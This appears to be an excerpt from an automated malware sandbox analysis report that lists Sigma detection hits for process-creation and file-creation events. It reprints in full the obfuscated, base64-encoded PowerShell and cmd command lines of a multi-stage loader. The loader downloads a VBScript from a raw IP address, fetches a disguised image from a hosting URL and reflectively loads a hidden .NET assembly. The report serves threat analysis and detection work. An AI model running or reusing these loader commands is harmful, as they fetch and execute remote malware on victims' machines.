"C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , ProcessId: 6500, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0Z
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVe
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , ProcessId: 6500, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline", ProcessId: 6080, ProcessName: csc.exe
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1488, TargetFilename: C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS" , ProcessId: 6500, ProcessName: wscript.exe
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1488, TargetFilename: C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))", CommandLine: PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTs

                    Data Obfuscation

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ